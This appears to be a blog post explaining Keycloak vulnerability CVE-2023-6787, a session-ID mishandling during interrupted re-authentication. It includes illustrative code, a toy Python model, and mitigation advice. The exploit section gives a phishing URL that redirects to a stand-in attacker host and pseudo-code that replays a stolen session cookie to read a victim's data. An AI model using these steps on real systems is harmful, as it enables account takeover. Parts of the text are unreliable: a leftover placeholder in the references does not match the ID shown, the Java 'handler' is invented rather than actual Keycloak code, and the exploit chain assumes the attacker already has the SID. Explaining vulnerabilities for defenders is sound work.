Keycloak is a popular open-source identity and access management tool used by many organizations to secure their web applications. However, in December 2023, a critical vulnerability was discovered: CVE-2023-6787. This flaw affects Keycloak’s re-authentication mechanism, allowing an attacker to hijack a valid user session by exploiting a mishandling of session IDs during interrupted logins.
In this post, we explain the vulnerability and how it works, and then show code snippets, exploit details, and references for further reading.
What Is CVE-2023-6787?
CVE-2023-6787 is a vulnerability in Keycloak’s authentication flow. It occurs when the re-authentication mechanism (found in the org.keycloak.authentication package) fails to safely handle a specific sequence of user interactions during a forced re-login.
The Root Cause
Keycloak supports the prompt=login query parameter (as per the OAuth2/OpenID Connect standards) to force a re-authentication flow. If a user has an active session and is forced to re-authenticate, they will see the login screen again. If, at this point, the user clicks "Restart login" (instead of logging in), Keycloak wrongly keeps the previous user's session but assigns it a new subject (SUB).
The issue:
Keycloak does not correctly invalidate the old Session Identifier (SID) of the original user session. The new session, even though it represents a "different" user, retains the same SID as the original. This allows an attacker to hijack the SID and effectively take over the original user’s session.
1. The victim logs in normally to a Keycloak-protected app. The session has a SID (say, SID123).
2. The attacker triggers a request to the same Keycloak login endpoint with prompt=login while the victim's session is active (e.g., via phishing or a malicious site redirect).
3. The victim is presented with a new login window. Instead of completing authentication, the victim clicks "Restart login" (or closes the window).
4. Keycloak creates a new session subject for the login but keeps the same SID.
5. The attacker can now use SID123 to access resources as the victim: the session takeover is successful.
Let’s look at a snippet that shows part of the vulnerable flow (abridged for clarity):

```java
// In Keycloak's authentication handler (simplified)
// Compare the literal first so a missing "prompt" parameter cannot cause a NullPointerException
if ("login".equals(request.getParameter("prompt"))) {
    // Forces fresh authentication, even if there is an active session
    session.logout();
    try {
        // User is presented with a new login and expects a new session
        session = sessionManager.createSession();
    } catch (AuthenticationException e) {
        // User cancels or selects "Restart login"
        // Vulnerability: the old SID (session ID) is NOT invalidated!
        // The session retains the previous SID, but a new user subject is assigned
    }
}
```
In a secure implementation, the session should always be invalidated when the user cancels, and a new SID must be issued.
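To make the difference concrete, here is a small Python model written for this post (it is not Keycloak code; the SessionStore class and check_sid_rotation function are my own names) that runs the five-step sequence above against both the vulnerable behaviour and the corrected one.

```python
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

@dataclass
class Session:
    sid: str
    sub: Optional[str]  # None while a prompt=login re-authentication is pending

class SessionStore:
    """Toy in-memory session store modelling the SID handling discussed above."""

    def __init__(self, rotate_on_restart: bool) -> None:
        self.rotate_on_restart = rotate_on_restart  # False: vulnerable, True: fixed
        self.sessions: Dict[str, Session] = {}

    def login(self, sub: str) -> str:
        sid = secrets.token_hex(16)  # fresh, unguessable session identifier
        self.sessions[sid] = Session(sid, sub)
        return sid

    def prompt_login(self, sid: str) -> None:
        # prompt=login: the user must re-authenticate, so the subject is cleared
        self.sessions[sid].sub = None

    def restart_login(self, sid: str, new_sub: str) -> str:
        # The user clicked "Restart login" and a login then completes as new_sub.
        if self.rotate_on_restart:
            self.sessions.pop(sid, None)   # fixed: the old SID is invalidated ...
            return self.login(new_sub)     # ... and a fresh SID is issued
        self.sessions[sid].sub = new_sub   # vulnerable: same SID, subject replaced
        return sid

    def whoami(self, sid: str) -> Optional[str]:
        s = self.sessions.get(sid)
        return s.sub if s else None

def check_sid_rotation(rotate_on_restart: bool) -> dict:
    """Run the interrupted re-auth sequence and report whether the old SID survives."""
    store = SessionStore(rotate_on_restart)
    old_sid = store.login("victim")                        # step 1: normal login
    store.prompt_login(old_sid)                            # step 2: forced re-auth
    new_sid = store.restart_login(old_sid, "other-user")   # steps 3 and 4
    return {
        "sid_rotated": new_sid != old_sid,
        "old_sid_still_resolves": store.whoami(old_sid) is not None,
    }

if __name__ == "__main__":
    print("vulnerable:", check_sid_rotation(False))
    print("fixed:     ", check_sid_rotation(True))
```

In the vulnerable mode the original SID still resolves to a live session after the restart, which is exactly the property the attacker relies on; in the fixed mode it resolves to nothing.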
1. Encourage a logged-in victim to visit the following URL, which includes the prompt=login parameter:

```
https://YOUR_KEYCLOAK_DOMAIN/auth/realms/master/protocol/openid-connect/auth
    ?client_id=attack-app
    &redirect_uri=https://attacker.site/callback
    &response_type=code
    &scope=openid
    &prompt=login
```
2. Victim Action
The victim is shown a login screen while already logged in. They click "Restart login" or cancel.
3. Exploit SID
The attacker, monitoring for leaked SIDs (via session cookies or browser storage), now reuses the session. Because the SID was not invalidated, the attacker controls the same session as the victim, but with a different user subject.
Example in Python (Pseudo-Code)

```python
import requests

# Session cookie carrying the SID that was not invalidated
session_cookies = {'KEYCLOAK_SESSION': 'SID123'}

# Attacker makes a request as the victim using the stolen SID
resp = requests.get(
    'https://your-keycloak-app/protected/resource',
    cookies=session_cookies
)
print(resp.text)  # Attacker gets the victim's data!
```
Mitigation
- Upgrading Keycloak to a version where CVE-2023-6787 is patched is critical.
- Ensure that session identifiers are always invalidated upon a canceled or interrupted re-authentication.
References (Learn More)
- Red Hat Security Advisory RHSA-2024:1182
- Keycloak Issue Tracker - KEYCLOAK-23368 *(replace Xs with real ID if available)*
- OpenID Connect: prompt=login Documentation
- Keycloak Official Releases
Final Thoughts
CVE-2023-6787 is a strong reminder that session management is hard, even for mature platforms. If you're running Keycloak, update immediately, and review all custom login/re-authentication flows for unsafe SID/SUB handling.
If you need more details, consult the references above or reach out to the Keycloak user mailing list for help.
Timeline
Published on: 04/25/2024 16:15:10 UTC
Last modified on: 04/25/2024 17:24:59 UTC